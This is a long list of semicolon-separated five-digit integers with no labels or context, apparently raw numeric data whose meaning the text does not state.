62360;61122;15870;57675;63745;44666;37433;39003;51257;37885;55235;50120;42838;34182;35135;65327;61436;46492;16656;16930;34900;28936;65184;59279;47648;43060;12378;46678;34681;14429;44292;26898;56181;50705;60459;32863;40611;59729;22578;50272;38555;37708;29268;65605;19288;14677;27201;55497;29662;44686;43447;51070;47404;16359;34430;39263;41456;52128;13123;46571;29979;62253;66322;36455;26783;66321;20066;43341;25755;14667;24263;30583;65410;59814;35238;22953;28853;25604;11662;60681;52800;41097;53294;57304;52109;54040;31371;23339;48528;64939;41824;41364;41780;19481;34647;38631;11611;49648;18928;10483;34435;31318;58291;25004;35645;11052;19560;26348;33657;38264;55258;30793;22406;66586;35690;52259;42826;40920;26140;19329;27263;56104;19021;44300;38651;48548;35137;26069;50398;55628;60808;27433;11993;49168;24765;19250;66246;12005;27461;56285;66729;36451;53182;51550;10486;28996;27193;63692;43200;39680;61011;47554;55918;61742;32805;60723;28594;30014;38528;59001;66363;34026;47229;48922;49897;49677;24472;13236;63078;31450;14335;60797;16759;35907;52248;14333;27143;56705;14548;41241;62209;14827;16006;16956;22218;46717;11841;54262;12560;31654;57692;31987;42781;50537;11111;50890;62942;50632;40755;54460;45660;51153;26534;27234;64209;43220;11058;37443;12626;13061;12418;15041;11657;21311;41453;16224;25140;62157;41155;20142;55637;20475;61271;46253;22237;25363;61246;58823;34195;45871;51372;52479;66334;46013;47053;47507;14430;11406;45376;45699;46883;18059;24540;32933;30374;57641;44807;41290;27030;54753;27138;14919;15549;57083;14920;32826;29947;20938;18317;56382;13690;42775;21391;20021;20972;51862;36683;63701;21334;60030;49245;54283;18434;59859;65120;23028;24624;34426;31944;65082;27266;56923;45382;54244;50847;57550;12642;55666;12703;50875;56126;39544;35399;28266;64440;42330;23776;43629;23445;23658;11307;31592;53644;28852;32734;29349;35870;29239;31821;31670;23229;39731;65111;28845;57268;19147;33176;65725;37112;29069;62884;36771;55352;36243;10120;45713;61343;35049;46785;32068;52377;56762;43123;34213;28429;45450;40589;22895;45966;60181;26356;56162;52089;35734;31164;60067;59761;39314;61778;39821;41698;64219;45402;26320;21941;16545;28939;58051;66234;58605;53164;35827;62234;26846;54819;18804;27468;53861;46579;29540;14000;51322;17324;64834;61411;52887;21607;45685;35989;21981;35182;23582;54600;33418;48857;56587;28820;20030;49002;40074;49406;64278;41607;59974;39337;22978;10069;14376;15029;14679;52348;19270;65830;66025;61822;12296;50332;26814;51635;60845;43773;21429;64895;51609;42362;14436;20258;55829;20240;20430;35964;38609;43378;15945;48679;57695;33108;27379;32449;37056;30481;64079;28258;36317;45721;56331;37473;33579;33346;42493;10438;46972;33986;42056;32368;50328;36794;48394;63354;14442;54324;49418;60749;64475;36041;56693;48557;27827;66629;16357;14758;35180;28895;54112;44860;60338;48982;21321;16475;18850;56430;25413;11119;28128;15638;38298;23446;46551;26513;10086;28887;28984;26412;16752;44534;56940;35596;39281;64025;48146;25552;34511;17101;40672;40526;55967;19524;31740;64022;39297;43580;20668;55256;17242;16110;32816;42448;15753;17096;24509;47837;16652;54824;45036;41720;41334;27596;23979;17617;23688;39843;24262;42012;41743;22248;38578;17056;64409;56085;52888;20842;66287;36070;18827;25427;62620;23651;15738;47749;38269;61510;46134;43456;31747;35225;52290;21781;39356;16226;57789;25724;29964;44624;32580;59218;37110;47564;16892;30201;49057;10404;59745;41704;66752;18299;16232;41911;38209;13681;20373;28257;63977;54977;53306;38494;52338;52234;22973;37991;35599;12883;31936;48530;29482;21436;49884;56695;48562;37680;33744;14952;66123;27707;62873;47876;44564;21479;53172;18771;60645;54950;32479;31565;16842;46127;15391;43150;64015;33775;28508;26116;49705;32829;13561;42525;35350;39764;20747;26685;40876;30039;66085;63070;46847;14790;15987;32758;13866;45282;64173;58069;61040;64568;22712;44418;60285;41395;17440;23041;19525;56406;19484;15381;38445;35875;60334;49146;45718;46690;50970;26453;63461;14382;21844;43551;23918;59433;48620;49051;37742;27390;57958;52650;15115;11116;30578;23897;37348;60202;39599;36296;33724;50656;55466;28816;22557;29594;65477;57701;54349;37772;23134;49998;32876;62585;56237;19240;52663;63913;27610;34828;23781;14829;34633;11905;14599;41595;46722;63746;52936;43549;11209;16733;45722;25888;57824;32519;28091;12357;56525;28385;59530;62717;14693;25603;28217;53972;20527;24266;66206;24840;54171;33508;36113;64439;16531;54181;24854;28243;54273;26769;13195;41569;58381;57940;34525;11778;24994;46724;13269;65054;19030;49514;11397;23411;53024;48643;60426;36947;17009;58808;57085;42315;36391;27196;34256;55163;56220;55651;33617;26310;47145;31214;26810;58519;50095;25816;38807;57128;53075;18879;43157;36630;35689;47089;61332;48834;39344;59368;53423;54653;22194;20848;43045;54006;60487;12595;37924;16418;10495;40330;29418;28563;50889;18151;24182;59890;51573;47576;16635;34079;13317;11350;28223;66049;31327;51367;29571;30715;10189;57346;25402;64583;31850;18012;18492;26550;41159;27232;47437;47863;60227;45447;18705;56558;19004;34982;26113;49588;14489;60337;46534;52550;27438;53430;53471;53725;27785;65299;26886;34732;66332;18085;40019;61062;37080;54795;21708;14572;58834;45218;29821;45118;58755;27653;40328;23042;25234;61865;22323;65154;53071;45048;28598;32542;42026;59288;20282;44269;16008;34606;56941;18239;60906;44734;41354;38365;55532;53387;18499;21018;27777;60539;20347;19928;40957;30232;47241;31537;10059;15906;66899;43135;26390;46372;53448;47510;50081;23999;62922;55657;61115;59453;64141;18514;40028;31553;15470;60586;53735;19545;30836;46708;13780;33291;57206;25185;35723;66587;29729;16137;16120;62883;58309;49980;41668;28999;31475;10088;29467;58921;46471;38157;43899;43867;12065;44256;27995;46288;48649;18429;27321;53600;53773;27594;51176;26870;42372;60145;56766;49400;52892;11569;13419;64999;12100;20654;10210;32405;24644;27293;17158;18479;62239;18438;55643;50861;20129;46126;63262;14970;33865;22699;17684;25171;45080;30040;22254;39776;58017;64231;41236;28908;18162;49261;10937;15250;62102;31702;16937;28808;61161;15364;17181;49289;42787;54868;44647;40164;15511;34234;12794;57003;58027;28927;48290;17739;24393;60891;29037;65763;36888;60536;27799;30689;27230;15269;63404;35526;46804;60883;38520;16401;47362;63426;19557;39676;66806;24150;12795;54526;21536;49149;11644;56539;64198;28018;15227;43961;19592;43093;58493;64613;15163;31798;65266;59806;54543;57623;61849;17004;26523;65523;63344;60242;64194;25143;37214;48202;27906;43484;59906;31106;18427;66702;58829;19997;46957;24565;20695;14018;65271;47360;48821;27284;55201;33752;47002;53008;40033;36170;50533;23218;45241;36017;58491;51895;40207;50134;42701;34829;43411;38557;17051;64672;43071;49977;28618;41929;33806;46514;62630;64156;35448;12270;59622;45636;63715;20468;57337;15066;26741;32814;43754;60330;51798;35795;15002;39146;56985;22810;10259;49005;53029;14310;23570;25423;13392;29708;16579;59962;40445;16859;18680;15232;45136;22310;18814;65922;20642;47597;19461;28044;39011;22990;29307;12563;16953;51198;18406;61876;40984;13243;50167;49711;27426;29484;18390;52560;40325;13710;58428;41284;62490;43519;32096;33997;13375;51419;30986;64752;33546;23596;23461;27251;24131;46828;44839;62801;56481;23311;16105;63108;55091;41865;51824;35579;57197;11031;21559;54915;48977;47186;31056;34158;16720;25335;45178;39035;25836;14281;20456;19412;58219;24613;16078;45052;44278;36681;20226;45643;60032;46846;30168;66326;14394;34575;32201;41430;21936;40791;10959;12528;26381;53446;36244;38502;25595;35736;20979;33317;30333;28798;21987;22487;17986;43344;26477;23792;52173;42897;47705;49747;23304;28589;50366;60052;46050;35850;60638;58736;13745;49524;26159;44690;21643;40277;59308;54083;36206;14805;58087;41123;35107;66614;24011;66816;62707;55283;31458;13834;60839;10965;52370;13515;59160;42266;63112;16855;61287;55744;28293;32312;21084;27374;15387;47144;60816;28181;38010;26752;27875;41602;53036;40148;59340;37733;48376;59216;37886;43498;39863;63088;48736;55998;66686;43357;59979;27262;63360;13085;19029;30154;52861;38139;42070;14617;54277;40378;66285;58960;24098;23234;27072;60092;24822;10015;20484;14118;44841;52535;49338;63213;38418;11173;12552;61154;47043;38280;62963;29767;27199;24153;28360;30438;33113;60642;46969;39383;53739;66630;20878;32467;64308;27079;28201;11970;26257;15764;36102;42462;30239;11918;27411;35087;45617;22047;49732;17466;62435;23430;66195;21058;45107;60461;65298;23458;26252;54700;44403;18242;37135;48344;20886;20198;50912;22603;20076;11516;66292;52330;17388;39802;12227;28619;39581;17756;65198;30381;30737;42756;19199;29756;32373;27441;31363;46696;32389;22181;41963;30308;51333;22116;20368;36071;17193;47397;44383;27545;56043;17665;46276;18459;28322;41161;56178;17105;21108;30396;58222;28479;47880;50420;44638;22604;65169;12684;52141;49751;32741;34180;31596;19011;47700;27330;61257;56434;66077;18214;46256;38179;51441;14519;53250;24111;21577;30656;34556;32616;12969;49052;48949;59144;39406;46328;12904;32395;15678;39095;39478;13248;25805;22804;57742;23224;32982;55755;31183;35532;20259;22350;32610;60369;25683;18215;26567;56552;44661;42005;54989;30797;13196;36830;21583;46699;47345;47182;38768;55036;20793;33516;36818;59633;38312;52154;59663;38023;32386;49442;45003;17256;39405;33233;14407;64414;24368;11585;40108;56045;18266;15284;63416;38442;10370;26568;26763;28760;19139;18234;16804;14031;51051;66148;30288;29223;15864;62644;21887;20245;27575;54215;49826;14988;51540;59464;45404;49434;56194;55096;43576;23646;63826;31223;57116;60049;12086;10467;47449;34958;65600;49616;19201;28439;50116;21626;63579;18560;34890;17488;51686;25569;13535;36053;34476;53903;50859;17983;45738;29248;16740;27358;30869;11664;37461;48655;23891;19186;54330;42341;20557;23246;40624;43062;21576;46203;58046;58580;23344;21003;20075;34437;24247;46344;32906;55378;26751;28250;57855;53768;62974;55037;34940;24839;25508;11338;62935;19454;54796;51152;55112;38273;27746;24699;17108;28611;32285;66395;43325;21754;36368;52581;17718;34073;59384;59269;57234;46165;27120;13947;51159;33784;55964;37057;17072;28822;55084;53242;52819;28366;26235;38395;21757;65914;62507;52152;49955;36898;54339;59917;40932;62794;45938;63298;16234;23951;40568;23088;13413;44755;60329;62508;57486;62138;53063;43982;54508;58686;35278;51586;33822;41184;66076;11575;39104;17114;61146;44952;18136;56218;32351;10141;53571;17777;17261;41272;65550;56929;16899;17577;19547;18133;14215;57097;60714;13043;36208;36246;45270;52201;43091;34204;34708;26253;24747;22959;40762;20105;30125;51509;61567;20840;35031;24575;11495;49318;11150;56502;59400;45500;38902;41278;20959;27170;63822;60563;63670;48703;37130;15807;45427;55409;19475;33741;10184;29196;41502;45819;12943;58398;20499;50144;35774;63930;11033;45220;41710;41365;43345;25366;50963;23595;21863;25534;49956;36890;38801;42498;17119;32842;49553;19690;22190;11537;35436;32641;32133;65210;47813;40604;10655;18481;60967;64306;50294;23704;17575;32993;18289;52528;19192;33364;39799;64144;44901;20190;11548;50662;12760;41092;27974;49891;38550;12489;38940;59798;10350;24851;37652;21305;42053;24567;13267;57772;30792;59268;22898;10304;21402;26244;65965;54168;17221;26332;47660;53211;45826;37170;31858;35356;33024;53065;41632;29014;32081;58310;17496;60275;23520;27704;29205;24617;62553;34543;51026;58890;11534;49123;38258;56248;60163;41593;53200;49569;30633;49475;25060;10525;56010;65386;28004;27959;23469;35728;27436;51035;34381;21821;18573;52362;52883;29198;16274;25223;55598;18765;49276;22049;64451;18906;56751;50056;26419;19859;60654;11901;37008;56666;41968;44792;47330;28642;48893;65610;45879;23558;65690;54802;55242;23104;57534;66878;59155;54364;35839;24836;56543;13532;16492;10527;22399;45393;61140;14151;30604;51574;14009;35837;15161;64996;46231;12301;40705;25292;13511;28173;63877;66057;29146;50937;33120;37241;41708;43746;19799;42365;13064;26824;29606;18207;21048;24906;31931;49273;58681;12875;65748;25383;41599;58644;31888;26809;29599;30004;59526;60751;15576;45075;15582;50354;16090;49300;31218;47105;54518;12782;28167;34057;38063;41858;10381;66149;27567;20563;60715;54834;62944;61068;52246;39041;46641;64180;33075;39033;36018;47243;61086;44362;41271;24124;14484;43985;64090;20953;62432;59674;45608;56243;32891;27168;42718;45085;56308;42323;44508;43400;38571;49314;60440;32130;16633;35072;29985;13366;59212;32959;63910;31659;47746;64097;51286;25479;63541;38370;48299;27613;27403;61697;10999;57425;34781;53463;13817;34722;57024;34954;13741;35270;49652;46614;23341;49574;10603;15362;34027;16807;33706;27865;47852;16602;19841;64154;56030;34134;28720;66947;10629;54200;55071;27921;11171;27007;57431;34983;61829;38114;20232;57240;50588;20008;17363;31173;27544;31305;29639;47381;39779;10442;16797;40470;61445;15729;33237;35389;31304;25537;36404;46961;30920;47382;45047;39948;64704;34127;64789;42626;15769;13544;29211;13041;28846;53354;62926;27314;60677;41500;56036;66772;17128;41985;57654;28535;64540;19209;24495;66732;11570;26213;57615;62257;24689;62191;27840;18793;47166;19602;27450;30676;42533;25548;34490;45588;24535;22401;24029;64656;47307;55696;46947;52196;65796;14796;51254;60921;11930;44174;30721;16107;31505;49177;59020;25882;20853;46421;54535;59900;41457;42071;65538;58734;45661;39445;54625;48578;11219;47012;24438;26510;62218;64947;43802;37140;56844;16396;45628;59259;63655;25151;41378;43915;19978;61554;36929;43974;36450;26753;54341;26160;40991;44153;65584;48256;56356;36306;52699;22770;21930;13918;56507;58119;14700;49210;44002;27034;20629;57184;29225;31570;44853;63728;57139;23316;20053;37641;64700;50803;17106;25420;31107;31151;64029;65552;50747;10144;27597;25339;49639;16233;42665;36524;59048;52880;52622;35366;25708;51103;32222;44207;60559;60492;58975;31335;38113;35187;43589;42598;41976;29232;31873;34694;39047;51233;19931;11250;42918;38724;10090;57868;23579;11106;22871;28744;24898;32043;55180;57378;47553;21435;44306;42465;21112;22591;43203;64957;23462;48356;20488;33486;23572;24718;14286;56943;33656;53556;29560;23350;12664;40305;46908;64253;44156;58256;22197;37646;39617;34459;63868;39342;54540;40578;41342;64641;63335;14071;47688;37089;64151;42324;38241;37701;55014;17232;14331;11435;49972;41998;27691;33754;27059;45328;36977;55924;29448;24648;22775;66281;46723;33916;38439;43581;48319;18114;46770;65613;31620;62550;19769;10830;38105;20613;66178;16386;52850;55769;49499;24552;21444;38675;41639;23027;50278;29274;21298;50792;42981;57788;54764;58103;21079;15143;43612;29410;60348;52192;53334;23071;15122;60744;60005;24405;17389;29332;65782;23925;60237;45482;15187;26018;60823;43846;49321;12575;15499;46318;36300;37159;35114;54650;30685;37428;49044;37565;21927;65087;32470;43279;15838;63806;23685;30650;17666;39660;42666;40874;24882;53857;54575;57062;47605;51282;31700;61292;15562;15890;56882;39833;21097;66200;36617;17160;62569;44820;38097;26853;26386;18456;36468;55530;11349;25034;50961;28929;24095;44254;15162;28701;49660;33236;47074;25996;65745;47336;43524;34844;43096;10417;60138;64241;27925;41729;26262;13898;51640;47152;60647;44217;65402;54591;41537;17527;64554;10658;62987;12994;39379;21217;66133;66760;52849;34167;36738;13768;23080;30649;27333;58731;37203;26239;21072;40094;63884;50319;56140;23168;16397;34904;45838;65428;24147;19009;58922;16271;60630;45177;46574;37865;15276;52156;28796;23405;42483;50041;41884;26435;36657;28006;23612;31470;56786;15028;40714;23657;64666;30211;33988;60579;21924;24963;13213;66319;46840;34050;30905;39275;30460;57952;39772;17269;22900;40912;59733;15146;57232;49807;25126;30261;10544;57947;10266;12337;65151;15960;49347;20598;52322;21427;62746;47772;61134;57756;56350;38320;58967;66638;35220;23009;66518;22314;26699;35573;29504;57336;43292;56757;44205;61390;39317;32656;32139;52978;50712;66566;61465;38561;55791;28922;31803;12332;58357;65568;41205;37799;31862;59390;55291;30106;17562;55568;41863;24740;38806;20933;33027;29033;12006;34754;56996;24754;25666;64083;47436;34439;28249;65629;54065;26943;65092;33602;44894;57322;59483;13208;50173;24065;11851;52032;19346;29140;26489;22635;44430;53870;40413;41398;40045;28363;64043;23610;52254;43289;16701;13667;24301;15287;29101;29483;22539;42516;30941;32703;47713;53886;56137;39531;16573;22545;26132;45288;62139;46791;37664;36769;54111;14270;20175;51382;65531;28550;36699;35171;17745;39991;11204;54737;11413;37484;60468;51447;28941;22569;43601;15403;26288;51588;14368;63596;31287;62188;52258;11018;42782;16539;55552;34162;22106;41510;13877;25365;41563;31133;23701;61985;33310;39887;17137;34075;34892;44506;33728;66662;62477;12359;50636;35578;50944;24695;52452;64912;57387;48324;21339;36426;53173;11163;24152;11621;42044;27581;21168;43673;54063;27708;42674;24035;43882;55382;49394;57126;30113;25893;31115;16073;21199;34704;60362;46607;18358;41147;12414;22149;35593;11579;20404;38946;28746;15654;53376;34238;37861;17470;48367;61692;11973;21202;31392;33250;55271;28096;47744;40782;65119;13310;12677;14390;47430;24830;60142;34386;38876;64155;42196;43603;26079;35285;24461;41283;46787;24692;30145;15519;45503;50370;62226;43574;16196;47216;30158;29088;30900;18458;18436;53028;31977;66221;22679;30926;12206;54690;51229;51733;64940;25385;19403;51855;59382;46031;53550;20536;48706;44113;40342;29124;26121;63257;26106;20945;41687;27978;55894;54617;52003;12389;46423;24305;50515;53567;23942;45031;27184;11456;66825;17439;33411;47018;26279;27788;24893;62543;40946;16126;66129;30370;59940;55023;48625;65406;11559;54827;36710;42271;44776;53058;35222;53370;28840;53895;52106;23242;30090;59638;47536;11589;25374;46208;32530;21335;45023;43180;43046;59683;24307;22470;48851;28902;52543;51097;23323;63462;33833;14521;39456;25305;19611;31583;45808;54706;33460;22384;31094;33521;59603;35826;48691;24149;27626;24665;22005;11425;56785;18839;42120;25507;44396;42141;55731;44425;28185;13805;44072;12578;10445;41397;42807;28020;59716;10173;37343;53361;56158;44846;20351;53576;47469;40465;47693;25127;18631;48403;10508;15779;20425;42524;20823;58198;27857;52244;51724;41871;62770;64953;52923;58776;60745;54253;30843;35881;23656;66278;45250;21239;49905;19336;21597;10729;53081;57368;30542;50179;42065;43236;43164;51607;27439;41586;47354;20788;61047;37420;56938;28501;30736;43983;12561;65290;57068;23121;17455;46379;10009;51658;25310;32275;64292;62465;39718;22144;43873;39226;59521;24811;18090;51239;55286;52977;48484;41709;66512;53156;56654;31114;46703;48792;13825;19057;40080;30666;21731;12932;47467;43583;15428;16195;18526;19265;64060;54018;57117;19770;61789;53989;56317;30866;53316;18071;59059;51983;48482;16698;59086;51868;16803;17198;13286;36310;29866;58570;57652;62119;44135;15957;49324;35161;17334;65248;62853;18009;36862;52673;39848;29237;22526;32273;14235;60056;26728;54534;19123;46824;15965;44586;52843;57904;45383;49728;60616;35325;29816;63879;39218;40766;57588;60995;22335;38861;15479;51506;57774;26808;42353;51115;66894;24295;10984;57475;61328;53767;58535;40929;31507;20290;19322;35273;45614;34691;63393;15497;44653;20816;44933;13625;11582;47773;35682;36097;40180;32146;55108;26934;55847;45755;63600;20585;32381;31431;23709;46016;41625;29226;57621;62051;44482;19361;46040;32639;32005;17268;33903;12967;64721;15084;47503;35988;57715;16534;13093;29497;23261;10031;46777;14425;64374;18926;20754;41555;28877;16692;39938;21327;24419;18891;51952;40432;42472;11168;56795;16857;61052;30247;10500;55451;46488;21562;56500;56015;17604;59727;49224;52345;61684;64336;50659;57442;54420;40244;63133;49877;22819;40288;10714;65497;52876;53188;41411;53254;50724;39393;18175;62860;58523;28542;49952;56593;26928;41699;33132;61004;65037;52716;64252;26492;25726;50369;62876;64313;59664;35816;62780;46647;55536;57959;35999;38944;24923;14567;31921;33337;15726;44101;47708;51320;28030;32648;52771;42784;32766;66356;28080;54118;51929;64094;29921;22620;11528;41134;51480;34173;65551;42951;17356;31597;18048;12062;26287;24655;57290;64024;16936;39245;34290;64467;63615;27163;14691;27867;32943;26346;41640;64191;14656;39989;32262;30066;10473;44920;29059;13259;56249;23435;28413;23689;64177;21799;66181;58858;65638;56646;43438;32890;22992;19249;43734;26035;51190;65434;50850;37400;45717;44539;26518;57726;42963;63948;50020;45296;19899;50625;52434;18498;38243;58900;62216;32402;15971;30859;38780;21343;54369;58035;26156;25643;61580;45411;45511;53865;32334;65948;40124;25744;44042;13943;63043;64223;53241;54372;12793;27994;29942;52688;41716;48864;63297;62217;55053;30022;47828;41219;16611;26031;16622;47612;28437;57539;37810;31627;18213;32196;58787;61169;13487;44336;37243;51891;23191;45862;65589;51291;58016;35105;15261;57252;17572;41781;56014;36373;38585;26578;24214;63787;41126;65155;30965;48297;40945;29561;14437;41853;10550;12774;52965;53054;47385;53178;11511;12751;47786;50524;12218;22295;64125;30411;58579;37096;29557;37796;14089;22304;34388;66804;33193;15107;51548;57101;62116;47771;22697;62321;63169;15016;31362;39858;41163;45339;12464;28935;45300;31199;42477;35027;33374;30485;14059;53802;50797;54718;28741;50371;65740;39349;26658;13676;31790;14443;46952;25325;59946;66264;52449;62535;55914;26097;52190;24324;64533;12713;39877;52678;23394;49413;45271;31971;59408;54651;32377;63585;15200;51943;50761;41183;30238;65481;24037;65003;10018;56256;32947;64078;37627;60252;58707;53732;26403;28794;41612;56145;29193;50463;23932;34043;52494;31964;66942;50831;18965;32211;48179;22633;29800;12316;23235;31869;15104;13144;17258;66864;43493;59629;46503;35524;23130;32671;20179;44509;53072;28230;38525;32371;42815;37375;17303;60785;28742;66424;48457;15547;19476;41452;64178;12352;39051;33597;62908;58085;32098;46368;52045;15145;38371;17674;16737;29347;14106;27303;36964;50784;57612;21915;21349;48489;44438;43833;17627;49346;28396;59854;21777;55294;47125;33477;57348;37915;46056;37459;23616;65056;17530;63072;23223;51305;24264;56204;20377;15935;56068;30245;17479;51245;47798;40708;16336;15295;41646;62221;40258;61325;26818;55509;57084;42905;33615;41073;52690;61000;47752;33160;63062;64279;65246;59354;56822;40913;52471;21829;13112;35659;53586;10609;44056;40115;56284;52854;21869;36778;63195;18168;26906;27850;26046;26669;16799;24901;52473;55625;30728;10004;63303;31802;45472;54610;66693;34777;14339;10835;46570;31482;51961;23312;42875;46806;54465;63499;26560;48252;63265;34384;53011;49770;52260;25983;29671;64573;33045;58636;12424;27229;64960;11917;16724;19607;23473;60057;47670;40491;38192;52018;52619;54995;46884;24066;34766;65486;56838;15835;58068;21389;32034;66968;49929;25261;16516;21734;45274;55995;44004;45135;58252;49232;41232;27513;46172;40818;24346;25336;43126;34314;41174;64186;56297;35882;49914;34620;30570;59799;41856;23256;33249;66151;49144;48881;62238;19619;31635;26900;57447;33378;55427;11049;25518;18007;38039;48172;51409;37578;48668;51627;59000;28092;16102;50778;47363;46335;52019;61638;27551;28663;48978;48462;13821;54831;12980;58693;64614;44267;52189;27923;57635;61281;58653;55158;20070;53507;14064;26393;42096;41669;59839;28959;65291;27927;26027;19838;17495;20050;39934;21496;43770;33172;53608;53968;24758;14834;47714;35414;49075;30724;59593;28043;62640;46303;26358;12837;41813;19196;56299;25789;45970;56363;21411;60021;14325;63918;17548;25449;19269;39902;11825;23775;55761;26644;47723;57805;10908;14816;43674;35938;28383;43446;43284;17274;21290;40147;26617;29168;63606;36608;62115;20048;51173;53115;44110;32818;66094;33982;51113;53395;24961;20641;47840;16047;30454;65837;29622;41214;14978;35613;55389;22447;52010;35098;14297;39439;10226;35415;24736;11323;56281;50439;61424;29156;10804;15535;29057;33130;65127;28347;57564;17775;51027;11815;52499;37088;54152;17531;62110;27755;20713;27386;15941;59714;64413;49756;42841;42468;21877;15443;51788;14727;14385;28503;48827;41798;48967;60607;23287;60341;59394;11121;19837;45944;10291;10470;46916;29084;33642;31536;66625;46649;55650;29413;60598;39493;43328;41274;33081;49285;17229;17144;10084;39310;49255;64563;32258;14219;52361;65209;53032;31153;60009;30379;48259;21062;27088;50966;20761;48867;40541;14282;25697;20722;33490;33878;22377;15368;23156;31823;27485;27044;36822;55081;22710;18396;45396;30874;40598;22771;44676;64624;60450;38670;34085;28398;64532;19233;57327;23782;47718;54662;14534;45420;13240;17238;39144;12210;23842;14752;27416;58868;63536;37338;65559;56813;54210;12543;16536;45035;11661;15097;12345;37787;51844;57901;34031;36951;14552;22484;60268;45248;42509;49609;11479;62573;16292;34943;49773;39486;19408;11502;22946;45642;28860;41671;54338;61166;64093;40709;49445;22689;57762;51181;28526;49506;21397;53697;30664;58767;65366;42257;52357;57263;33056;58000;27899;21377;20529;21609;59653;35928;17522;57389;37803;39322;14842;63914;43212;28844;23281;43383;21223;29897;25864;44777;44140;16844;55944;60153;15474;28032;49848;29322;27960;13165;20062;21375;39143;29258;35582;54096;16661;52280;55557;45723;11903;49799;18017;11916;43152;15189;28558;60819;60613;59779;54880;46968;23687;20269;11275;23184;63180;11200;10352;36633;23954;60069;17459;42593;54660;52778;33502;13652;45946;24924;56657;49549;10397;41972;42278;45709;30236;66513;61796;10848;18829;59585;65094;28966;32862;21819;27742;45934;61768;45014;27817;44548;12540;60947;59681;25210;14528;45200;55068;64491;51614;22888;48542;65525;38124;12305;57285;32307;55277;52414;46819;54749;44528;49014;65574;47902;56371;28356;33679;24715;58941;18726;30654;16419;11535;41415;30276;58581;25588;14371;25574;20071;46338;37819;39295;42579;43377;63951;29566;64767;30494;47208;46562;11493;54748;22847;60342;61085;31054;47374;23767;39826;64738;30727;32715;57977;57865;33001;40420;33447;40696;36245;45839;14453;46686;59266;26157;55404;21388;40518;56506;35821;17050;53771;61626;52122;41455;40017;20908;29843;19868;22132;50304;48607;64900;54512;63886;11723;43720;56662;52608;16898;43965;52094;19328;40739;19871;50070;17041;11081;53396;18715;23578;50340;35163;42678;42941;14254;58584;45705;54696;62247;65707;39294;16527;12520;43435;21889;24787;20614;59482;60353;39025;55782;33990;47023;51813;25746;48981;61810;50605;28425;45539;34955;36988;49016;13355;11892;59275;63512;22564;14111;23031;27114;49359;25851;23243;39657;65253;65470;59429;27316;36521;35699;38845;17519;27570;18077;59679;21114;24935;39036;10150;24431;23343;57560;15400;20055;54138;51110;60857;11133;47466;46730;47735;52288;54741;24680;63940;57844;34504;60700;60908;32354;17824;40888;34222;12562;17325;13462;66000;64664;48584;64091;49452;22060;38784;42030;65506;37712;25485;39525;38152;39183;50821;13435;27516;13391;13500;11148;49288;29575;35864;65510;46802;10108;10997;22565;20630;15587;58031;53290;53706;32079;59778;19426;13666;49721;28801;23511;21160;46529;20518;35860;54694;38737;43218;25268;16324;10852;34205;61083;13634;34324;15787;54799;41448;57864;28919;17502;27260;51582;12090;31255;27443;15098;28577;42379;58779;26210;59661;24055;25514;47163;43528;24047;33697;35331;26571;24555;61327;34219;66721;44234;33124;23944;41424;14225;33888;10688;21455;42441;10667;57689;65023;58208;13739;19720;35612;28612;64526;46693;29119;39628;63143;36099;27800;66465;21196;28045;27125;33685;31962;52623;45635;65391;63663;31830;39135;11438;55351;61049;61208;57293;13715;48609;47296;66125;50689;43311;19488;40390;42744;63387;14598;15979;44007;17489;65519;28182;65178;54225;28802;47775;16455;53410;13274;54193;37193;56572;29539;22054;40245;63289;35982;59571;19918;52639;15195;48592;28327;53775;14221;45299;33095;54038;28682;44538;30181;13404;49900;10100;22551;40171;20163;38233;48352;58370;51634;49965;65123;63096;66777;46568;51191;26694;51962;50367;15502;42698;35197;33716;23587;32515;13116;29392;30713;35575;60703;11718;53047;19767;28103;23289;40000;14066;61892;54101;29786;36022;58078;49111;22945;10954;57347;36218;18231;38389;47122;38589;66731;42597;19893;64989;44597;35985;38140;16364;66546;41172;33345;28116;24989;54399;62220;16668;48164;62208;23844;57843;35459;57574;50590;31456;53454;20814;27744;53822;38231;55591;61623;64243;40512;53686;46891;18469;25405;17702;21357;18170;58080;47154;26559;18334;64663;55820;10122;66778;20997;26047;32640;26278;19961;21330;45509;10521;64450;33357;52131;29846;15839;18066;34174;21283;56422;19601;58026;56091;48944;42848;48595;47100;23161;35639;42600;30515;11302;31848;56891;59956;23848;46934;12662;56946;22995;59147;54467;53795;39560;19118;59953;58468;33973;63115;63292;53908;35719;50960;45191;29203;29953;66905;28771;44218;27834;51581;34486;15917;27554;24568;58850;51728;24194;18045;33937;14571;66383;23974;19041;50826;30768;20727;29832;48822;23388;60731;18621;44904;21288;44031;46483;46420;48957;20836;16598;60543;16237;44851;26806;24712;59452;47886;23465;62624;12085;17985;37038;56724;14689;62372;36972;44321;19337;38336;48942;37848;53529;49325;40063;61529;22611;27725;47738;33409;45428;24360;39246;35245;11998;48928;51076;18605;36615;10854;18308;57463;18628;25745;36401;42183;53812;50054;59229;13249;15891;31259;30531;24271;31950;40428;65891;20556;65842;61680;19903;10185;32545;33864;53671;50981;15929;57799;29040;54567;51902;33779;61183;38295;13585;23452;46925;49221;29849;50043;28474;11353;38128;18082;22802;20678;42613;38792;47873;63008;45775;56442;64114;52695;46258;15871;43025;28751;21150;65033;51347;56551;54916;15202;38401;61537;26136;53369;56990;56682;11247;18789;30322;55050;26437;56549;65293;50231;64211;10784;39841;20690;55978;56789;27157;31332;45926;58750;52900;15951;53149;61767;33554;25358;26691;39552;45579;48560;12708;62966;18650;46750;39939;53439;55757;31000;27471;49132;55183;16895;47316;33945;27259;36283;29509;38932;20657;57948;25155;21197;11455;26302;23444;11314;37717;28945;50626;35192;10549;49043;47881;43820;24447;31929;60748;19895;27524;13183;34376;56197;62887;40291;22166;26168;47097;62863;41718;28348;11112;25085;36875;57877;12823;62997;21198;27021;59573;56388;63152;32537;22664;29833;49011;41059;30332;38033;31784;28668;31111;64291;55042;50270;28087;25988;39574;22450;63666;30969;11288;55866;58250;12413;16957;38227;14991;50613;27014;51234;48270;22421;13046;51118;21122;34171;33805;43048;17573;62906;24053;22191;52948;15594;41050;48447;31252;25271;55490;33717;50032;57912;18655;31093;38567;46903;25168;20977;61921;31852;19438;25300;46919;43637;54532;46738;45046;62613;62637;23125;30386;36919;21654;43975;51390;29334;49712;46044;49997;57129;42589;21060;55082;24825;21090;17508;45269;37502;31729;17094;42370;38672;16367;49681;55594;10920;14533;21666;15650;39289;31860;26849;51182;54025;38770;42020;11630;47671;58258;19880;52079;15712;29137;54770;65719;32757;52851;29940;61193;36856;58794;18957;60567;24436;21066;18450;32271;39700;50221;40570;21989;21073;46282;19710;35284;43418;46533;50348;31634;49120;36820;23911;42157;18887;19091;55321;22970;39017;41067;